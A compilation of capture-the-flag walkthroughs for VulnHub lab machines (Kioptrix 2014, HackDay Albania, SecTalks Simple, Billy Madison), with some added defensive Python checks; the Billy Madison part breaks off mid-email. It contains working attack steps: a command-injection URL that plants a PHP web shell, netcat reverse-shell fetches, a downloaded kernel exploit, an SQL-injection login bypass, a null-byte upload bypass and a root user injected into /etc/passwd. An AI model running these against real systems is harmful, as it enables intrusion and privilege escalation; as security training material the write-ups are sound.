[VULNHUB] Kioptrix: 2014 (#5)

This VM is the first of my OSCP series; these VMs are similar in difficulty to the OSCP ones. Let’s start!

DIRECTORY TRAVERSAL IS YOUR FRIEND

Always start with an nmap scan:

nmap 192.168.1.21 -sV

This is what I got:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-23 09:55 CET
Nmap scan report for 192.168.1.21
Host is up (0.0052s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds

There is a closed SSH service and two HTTP web servers. I tried to do some research with nikto:

nikto -h 192.168.1.21 -p 80

The output is the same for port 8080:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2016-11-23 09:57:14 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 18:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2016-11-23 09:58:58 (GMT1) (104 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Wow! It seems to be vulnerable to a buffer overflow which allows remote code execution. I did some research and found the exploit, but it didn’t work because the Apache and OS versions were up to date. So I browsed to http://192.168.1.21 and there was just an “It works” string. Checking the source code of the HTML page I found a comment with a URL:

URL=pChart2.1.3/index.php

There is a pChart2.1.3 directory. I opened it and the index of the platform appeared. After some research I found these vulnerabilities. Directory traversal seemed interesting, so I browsed to http://192.168.1.21/pChart2.1.3/examples/index.php?Action=View&Script=/etc/passwd and the file was printed to my screen. I thought that could be the attack vector. Next I browsed to http://192.168.1.21:8080 but got Error 403: Forbidden. I went back to the first website and used the same traversal to read the FreeBSD Apache configuration file: http://192.168.1.21/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf. This is the relevant part:

Allow from env=Mozilla4_browser

That’s why I can’t access port 8080: I need a User-Agent that matches the Mozilla4_browser environment variable.

SHELL THE WEB

So I fired up Burp Suite, activated the proxy without interception and changed the User-Agent to simulate Internet Explorer. Now I could access port 8080, where directory listing was active and showed a single directory, phptax. Once in the PHPTAX index I again researched vulnerabilities and found a remote code execution. I could use the Metasploit module, but let’s try the hard way. I used this one. Netcat didn’t work, so I created a PHP shell with this:

http://192.168.1.21:8080/phptax/index.php?pfilez=xxx;echo %22%3C%3Fphp system(\$_GET['cmd']); %3F%3E%22 > shell.php&pdf=make

Now, navigating to http://192.168.1.21:8080/phptax/shell.php?cmd=ls, I can view the files. Next I used the pentestmonkey PHP reverse shell. First of all I started listening with netcat:

nc -lvp 1234 < php_reverse_shell.php

Now I executed that on the browser:

http://192.168.1.21:8080/phptax/shell.php?cmd=nc 192.168.1.12 1234 > reverse_shell.php &

I checked the download with the ls command. Then I started listening again with netcat:

nc -lvp 1234

Then I browsed to http://192.168.1.21:8080/phptax/reverse_shell.php and got a shell in my terminal, without a TTY. I tried to upgrade the limited shell to a full TTY but couldn’t find a way, so I continued with the limited one.

YOU HAD TO UPDATE YOUR FREEBSD VERSION MATE

Now I need to escalate my privileges. I checked the kernel version:

uname -a

The output is:

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

Ok, so I need to search for a FreeBSD 9.0 privilege escalation, and I found an interesting exploit. I downloaded the .c file locally and transferred it via netcat into the /tmp folder. Then I compiled and ran it:

gcc exploit.c -o exploit
chmod +x exploit
./exploit

Now I checked that I was root with the id command and browsed to the /root directory. I listed the files and opened congrats.txt:

If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targeted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
Its default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory.
Lastly, the ossec-alerts.log file is where OSSEC-HIDS puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

[VULNHUB] HackDay: Albania

HackDay: Albania is a really interesting VM where I learned a few new things about SQLi and PHP.

TOO MANY DIRECTORIES

First of all scan the available ports of the target:

nmap 192.168.1.19 -sV -p 1-65535

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-21 09:24 CET
Nmap scan report for 192.168.1.19
Host is up (0.013s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.20 seconds

So there is an SSH service and an HTTP one.
Before browsing to http://192.168.1.19:8008 let’s grab some information from nikto:

nikto -h 192.168.1.19 -p 8008

I discovered that there are a lot of entries in the /robots.txt file, so I opened it:

Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

Opening a few of them shows the same image, which says that it is not the correct directory. So I used curl in a loop to discover which folder was the right one. First of all I created a .txt file with the folder names, one per line without slashes, then I wrote a script:

# Read one directory name per line from list.txt and fetch each one,
# following redirects (-L) and silencing the progress meter (-s)
while IFS= read -r dir; do
    printf 'Testing %s folder...\n\n' "$dir"
    curl -sL "http://192.168.1.19:8008/$dir"
    printf '\n\n'
done < list.txt

On the terminal output I found a different HTML source code:

Testing unisxcudkqjydw folder...

IS there any /vulnbank/ in there ???

BINGO!

THIS BANK IS NOT SO SECURE

Browsing to http://192.168.1.19/unisxcudkqjydw/vulnbank I discovered that directory listing is active and there is only one folder (client), so I clicked on it and the Very Secure Bank website appeared. There is a login form, so I tried some SQLi techniques: I entered a single quote character and an error occurred:

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102

Ok, it seems to be vulnerable to SQLi. I spent a lot of time finding the right pattern: I tried OR, AND and UNION without success. After some hours I had the idea of using a comment to ignore the rest of the query, like this:

user' #

I used # because the -- comment returned an error, while with # I only got “Invalid Credentials…” (in MySQL, -- only starts a comment when it is followed by a whitespace character, whereas # does not need one). Now I brute-forced the username with Burp Suite: I captured the POST request and used Intruder with the following payload:

POST /unisxcudkqjydw/vulnbank/client/login.php HTTP/1.1
Host: 192.168.1.19:8008
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.19:8008/unisxcudkqjydw/vulnbank/client/login.php
Cookie: PHPSESSID=cfg95pqu6gukj980niqriu7uq0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=§user§' #&password=something

I used rockyou as the wordlist and after some time I discovered that jeff’ # worked. I logged in with this string in the username field and the user’s bank homepage appeared. There is an upload form for tickets where I can upload images. First of all I tried with a .gif, but the page returned an error:

After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...

So I tried with a .php%00.jpg name, using a null byte, and the image was successfully uploaded. I clicked on the last ticket created and then on the blank image thumbnail, but an error occurred:

Warning: include(): Failed opening 'upload/php-reverse-shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/unisxcudkqjydw/vulnbank/client/view_file.php on line 13

There is an include error, so maybe there is an include() call in the PHP code? If so, I can upload a plain .jpg file with PHP code inside and it will be interpreted as PHP anyway. Let’s try. I used this reverse shell. The upload was successful, so I started listening locally:

nc -lvp 1234

Then I opened the last ticket again and I got the reverse shell!

PAY ATTENTION TO SENSITIVE FILES, DEAR SYSADMIN

Now I need a TTY, but python seems not to be installed. Before giving up, let’s do some research:

find / -name "python*" 2>/dev/null

I found python3 in the /usr/bin folder, so I typed:

/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'

Now I have a TTY and need to escalate privileges. I found only one user in the /home folder, but it was useless, so I searched for files with bad permissions:

find / -writable -type f 2>/dev/null

And the first result was the /etc/passwd file! So I copied its content locally so that I could add a new user. I also needed to generate a hashed password, because the default policy on current Linux systems doesn’t allow logging in to an account without a password:

openssl passwd -1

I used “test” as the password and now I can add a new line to the passwd file:

test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash

Notice that I set UID and GID to 0. Now I saved the file and encoded it in base64:

base64 -w 0 passwd

Now I copied the base64 string and I typed this into the reverse shell:

echo "BASE64_STRING" | base64 -d > /etc/passwd

I omitted the base64 string because it was very long. Now verify that the file was overwritten:

cat /etc/passwd

This is the output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash

Now just log in as the test user:

su - test

And now we are logged in as root! List the files and you will find the flag:

cat flag.txt

Finished!
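The privilege escalation above works because /etc/passwd was world-writable and because a password hash placed directly in the second field is honoured. As an added example (not part of the original post and not the VM’s own code), here is a small audit that would have flagged exactly that: it parses passwd lines, reports non-root accounts with UID 0 and accounts whose password field holds hash material instead of the shadow marker, and checks a file mode for the “other write” bit. The sample entries are constructed from the listing above.

```python
# Added example (not from the original write-up): audit an /etc/passwd file
# for the tampering shown above. The sample below is constructed from the
# listing in the post; a real check would read the file from disk.
import stat

# Constructed sample: a trimmed copy of the listing above, including the
# injected "test" entry with a password hash and UID/GID 0.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash
"""

# Values that legitimately appear in the second field when the real secret
# lives in /etc/shadow ("x") or the account is locked ("*", "!", "!!").
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Parse passwd(5) lines into tuples; raise on malformed lines."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append((name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text):
    """Return human-readable findings for suspicious passwd entries."""
    findings = []
    for name, pw, uid, gid, gecos, home, shell in parse_passwd(text):
        if uid == 0 and name != "root":
            findings.append(f"{name}: UID 0 account that is not root")
        if pw == "":
            findings.append(f"{name}: empty password field (passwordless login)")
        elif pw not in SHADOW_MARKERS:
            # A hash (or plaintext) here bypasses /etc/shadow entirely and is
            # readable by every local user, since passwd is world-readable.
            findings.append(f"{name}: password material stored in /etc/passwd")
    return findings


def mode_is_world_writable(mode):
    """True if an st_mode value grants write to 'other' (the root cause here)."""
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_SAMPLE):
        print(finding)
    print("0644 world-writable?", mode_is_world_writable(0o100644))
    print("0666 world-writable?", mode_is_world_writable(0o100666))
```

On a real host you would feed audit_passwd() the contents of /etc/passwd and mode_is_world_writable() the st_mode from os.stat("/etc/passwd"); both findings together are a strong indicator that the file was tampered with rather than misconfigured by a package.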

CONCLUSION

This is the source code of config.php; in particular, focus on these lines:

function check_login($username,$password){

    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    $password = str_ireplace("'","",$password);
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if($result >= 1) {
        return $result;
    } else {
        return -1;
    }
}

The strings OR, UNION and AND are stripped from the username field, while the single quote is stripped only from the password field; the quote in the username is left alone. That’s why we used the user’ # string. Also check out view_file.php:
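To make the point of the filter concrete, here is an added example (not from the original post and not the VM’s code) that mirrors the str_ireplace() calls in Python, shows the exact SQL string the vulnerable code would hand to MySQL, and puts a parameterized version next to it. The klienti table, the jeff row and its password are constructed for the demo; the vulnerable query is only built as a string, never executed.

```python
# Added example (not the VM's code): a Python mirror of the check_login()
# keyword filter from config.php, next to a parameterized version. The
# table, the "jeff" row and its password are constructed for the demo.
import re
import sqlite3


def php_filter(username, password):
    """Replicates the str_ireplace() calls: strips OR, UNION, AND from the
    username (case-insensitively, anywhere in the string) and the single
    quote from the password. Note what it does NOT remove: the quote in the
    username and the # comment character."""
    for keyword in ("OR", "UNION", "AND"):
        username = re.sub(re.escape(keyword), "", username, flags=re.IGNORECASE)
    password = password.replace("'", "")
    return username, password


def build_vulnerable_query(username, password):
    """The string config.php hands to execute_query(); built here only to
    make the resulting SQL visible. In MySQL everything after # is a
    comment, so the password clause disappears."""
    u, p = php_filter(username, password)
    return (
        "SELECT ID FROM klienti where `username` = '" + u + "' "
        "and `password` = '" + p + "';"
    )


def make_demo_db():
    """In-memory SQLite stand-in for the klienti table (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE klienti (ID INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Real code would store a password hash, not the password itself.
    con.execute("INSERT INTO klienti VALUES (1, 'jeff', 'demo-password')")
    return con


def check_login_safe(con, username, password):
    """Parameterized version: user input never becomes part of the SQL text,
    so no keyword blacklist is needed and legitimate names are not mangled."""
    row = con.execute(
        "SELECT ID FROM klienti WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else -1


if __name__ == "__main__":
    print(build_vulnerable_query("jeff' #", "something"))
    print(php_filter("victoria", "")[0])  # the filter also breaks real names
    con = make_demo_db()
    print(check_login_safe(con, "jeff' #", "anything"))      # -1
    print(check_login_safe(con, "jeff", "demo-password"))    # 1
```

Two things the demo makes visible: the blacklist silently corrupts legitimate input (a user named victoria becomes victia, so she can never log in), and it does nothing against the one character that matters, the quote. With placeholders the payload jeff' # is just a username that does not exist.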

$klient_id = $_SESSION["id"];
$filename = $_GET["filename"];
if(endsWith($filename , ".jpg") || endsWith($filename , ".png") || endsWith($filename , ".jpeg") || endsWith($filename , ".bmp")) {
    include("upload/" . $_GET["filename"]);
} else {
    echo "Only images are allowed to get included. We hate hackers.";
}

This code only checks whether the filename ends with .jpg, .png, .jpeg or .bmp; if so it includes the file, and PHP executes any code inside it regardless of the extension.
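Both the view_file.php include above and the pChart Script= parameter from the Kioptrix post share the same root cause: a user-supplied name is joined to a directory without checking where it ends up or what it contains. As an added example (not from the original post and not the VM’s code), here is the set of checks a file-serving endpoint should run before touching “upload/<name>”: reject NUL bytes (the %00 trick), reject any path component, apply a case-insensitive extension allow-list, confirm the resolved path is still inside the upload directory, and verify the file content against the magic bytes of the claimed image type. The upload directory and the sample bytes are constructed; nothing is read from disk.

```python
# Added example (not the VM's code): the checks view_file.php should do
# before touching "upload/<name>". The same containment check would have
# stopped the pChart Script=/etc/passwd traversal in the Kioptrix post.
# DEMO_BASE and the sample bytes are constructed; nothing is read from disk.
import os

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".bmp"}

# Leading bytes of the image formats the page says are permitted.
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".bmp": b"BM",
}

# Constructed upload directory; it does not need to exist for the checks.
DEMO_BASE = os.path.join(os.getcwd(), "upload")


def safe_upload_path(base_dir, filename):
    """Resolve filename inside base_dir or raise ValueError.

    Rejects NUL bytes (the %00 trick used above), any path component
    (../, absolute paths) and extensions outside the allow-list. The
    extension test is case-insensitive, unlike the original endsWith()."""
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    if filename in ("", ".", "..") or os.path.basename(filename) != filename:
        raise ValueError("path components are not allowed")
    if os.path.splitext(filename)[1].lower() not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, filename))
    # Belt and braces: even after the checks above, make sure the resolved
    # path (symlinks included) is still under the upload directory.
    if os.path.commonpath([base, full]) != base:
        raise ValueError("path escapes upload directory")
    return full


def is_accepted(base_dir, filename):
    """Boolean wrapper so callers can test without exception handling."""
    try:
        safe_upload_path(base_dir, filename)
        return True
    except ValueError:
        return False


def looks_like_image(filename, data):
    """Content check: the bytes must match the magic of the claimed type.
    A PHP file renamed to .jpg fails this even though its name passes."""
    ext = os.path.splitext(filename)[1].lower()
    sig = MAGIC.get(ext)
    return sig is not None and data.startswith(sig)


if __name__ == "__main__":
    for name in ("ticket1.jpg", "shell.php\x00.jpg", "../../etc/passwd", "evil.php"):
        print(repr(name), "accepted:", is_accepted(DEMO_BASE, name))
    print(looks_like_image("a.jpg", b"\xff\xd8\xff\xe0JFIF"))     # True
    print(looks_like_image("a.jpg", b"<?php echo 'hello'; ?>"))   # False
```

Even with these checks, the real fix for view_file.php is to stop using include() on user files altogether: send the bytes with readfile() and an image Content-Type, so that whatever an uploader managed to embed is never parsed as PHP.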


[VULNHUB] SecTalks: BNE0x03 – Simple

This VM is a really easy boot2root challenge. I pwned it in 5 minutes, let’s start!

PART ONE

I scanned all available services with nmap:

nmap 192.168.1.20 -sV

The output is:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-15 19:09 CEST
Nmap scan report for 192.168.1.20
Host is up (0.0021s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.29 seconds

So there is only a website here. I opened it and found a login form. The server is running CuteNews v.2.0.3 and after some research I found an arbitrary file upload vulnerability here. So I registered a new user (testuser in this case) and logged in, then clicked on “Personal Options”. I started Burp Suite and activated proxy interception. Then I downloaded this shell, edited the first two lines with my local IP and listening port, renamed it with a .jpg extension, clicked “Browse…”, selected the file and pressed “Save Changes”. I edited the POST request in Burp Suite, changing the extension to .php, forwarded the request and the file was uploaded! Then I started listening locally:

nc -lvp 1234

Now I browsed to http://192.168.1.20/uploads/avatar_testuser_php-reverse-shell.php and got a reverse shell without a TTY. To get one I just used python:

python -c 'import pty; pty.spawn("/bin/bash")'

PART TWO

Now I need to escalate privileges. I started checking the kernel version:

uname -a

The output is:

Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

I checked the kernel version online and discovered that it was vulnerable to the overlayfs exploit. So I browsed to /tmp and typed:

wget "https://www.kernel-exploits.com/media/ofs_32"

Then I gave it execution permissions:

chmod +x ofs_32

And now I just executed it:

./ofs_32

I got a shell as root! I re-spawned a TTY shell with python, browsed to /root, listed the files and found flag.txt. I just opened it:

U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!

The VM is rooted and completed!


[VULNHUB] Billy Madison: 1.1

Billy Madison is a boot2root VM inspired by the film of the same name. Our goal is to root the machine and decrypt Billy’s 12th grade final project. Let’s start!

PART ONE

Start with an nmap scan:

nmap 192.168.1.17 -sV

The output:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-14 17:38 CEST
Nmap scan report for 192.168.1.17
Host is up (0.00045s latency).
Not shown: 994 filtered ports
PORT     STATE  SERVICE     VERSION
22/tcp   open   tcpwrapped
23/tcp   closed telnet
80/tcp   open   http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2525/tcp open   smtp

First of all I tried to browse to the HTTP website, but there was nothing interesting, so I tried to connect to SSH:

ssh 192.168.1.17

But I got an error:

ssh_exchange_identification: Connection closed by remote host

Mmmmh, there are two services left to analyze, telnet and SMB. I chose the second one because the telnet port was closed:

smbclient -L 192.168.1.17

When it prompted for a password I used a random one and got an interesting output:

WARNING: The "syslog" option is deprecated
Enter cristiano's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Sharename       Type      Comment
    ---------       ----      -------
    EricsSecretStuff Disk      
    IPC$            IPC       IPC Service (BM)
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Server               Comment
    ---------            -------
    BM                   BM

    Workgroup            Master
    ---------            -------
    WORKGROUP            

There is a share (EricsSecretStuff) and I can try to open it:

smbclient \\\\192.168.1.17\\EricsSecretStuff

Now I got an SMB shell and, listing files, I found ebd.txt. Open it with gedit:

gedit smb://192.168.1.17/EricsSecretStuff/ebd.txt

Again, type a random password when it prompts. The content of the file is:

Erics backdoor is currently CLOSED

So I discovered that there is an SSH backdoor in the system, but at the moment it is closed. I finished analyzing the SMB service, so now I can switch to telnet:

telnet 192.168.1.17

This is the output:

Trying 192.168.1.17...
Connected to 192.168.1.17.
Escape character is '^]'.


***** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****

Connection closed by foreign host.

Paying attention to the message I noticed the upper-case string ROT near rkfpuzrahngvat; ROT is an old cipher family (the Caesar cipher is one example). I tried the weakest one, ROT13 (Google it if you want to know why), because of “I don’t use ROTten passwords”. So I pasted rkfpuzrahngvat here and the decoded string is:

exschmenuating

What can I do with that string? After some minutes I tried to browse to http://192.168.1.17/exschmenuating and a new page appeared. The interesting part is:

OMg LOL LOL LOL!!! What a twit - I can't believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks! Anyway, malware installation successful. I'm now in complete control of Bill's machine! 

Now I know that there is a .cap file in this folder whose name contains “veronica”, and that she uses her name as part of her passwords. A hint for brute forcing the file name is “she rocks!”, which reminded me of the rockyou.txt wordlist. So I created a new wordlist from rockyou.txt with the passwords that contain “veronica”:

grep veronica rockyou.txt > veronica.txt

Now I used Burp Suite Intruder to brute force the filename with the following payload:

GET /exschmenuating/§var§.cap HTTP/1.1
Host: 192.168.1.17
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: max-age=0

I loaded the veronica.txt dictionary and after some seconds I got the filename: 012987veronica.cap. I downloaded it and opened it with Wireshark. Analyzing it I discovered that it was a mail conversation between Veronica and Eric. The first mail is:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just click here to install it, k?  

Thanks. -Eric


.
QUIT

The second one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
